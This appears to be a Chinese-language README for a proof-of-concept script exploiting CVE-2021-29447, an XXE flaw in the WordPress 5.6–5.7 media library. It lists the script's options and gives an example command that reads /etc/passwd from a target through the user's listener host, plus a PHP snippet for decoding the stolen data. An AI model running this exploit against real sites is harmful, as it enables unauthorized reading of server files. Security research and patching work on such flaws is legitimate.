╔═╗╦ ╦╔═╗
║ ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023
═══════════════════════════════════════════════════════════════════════════
[*] 标题: Wordpress 媒体库中的 XML 解析问题导致 XXE
[*] 受影响版本: Wordpress 5.6 - 5.7
[*] 已修复版本: Wordpress 5.7.1
[*] 安装版本: PHP 8
═══════════════════════════════════════════════════════════════════════════
CVE-2021-29447: 拥有上传文件权限的用户(如作者)可以利用媒体库中的 XML 解析问题发起 XXE 攻击。这要求 WordPress 安装使用 PHP 8。成功的 XXE 攻击可以访问内部文件。该漏洞已在 WordPress 版本 5.7.1 以及通过小版本更新的受影响的旧版本中得到修复。
此脚本易于理解和使用,将自动执行利用 WordPress 媒体库 XXE 攻击所需的步骤。
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]
options:
-h, --help 显示此帮助信息并退出
-l LHOST, --lhost LHOST 你的服务器 IP 地址,例如 10.0.2.15
-p PORT, --port PORT 你的服务器端口,例如 1337
-f FILE, --file FILE 要读取的系统文件,例如 /etc/passwd
示例:
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd
要解码 base64,请使用/运行以下 PHP 代码片段:
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
$ php decode.php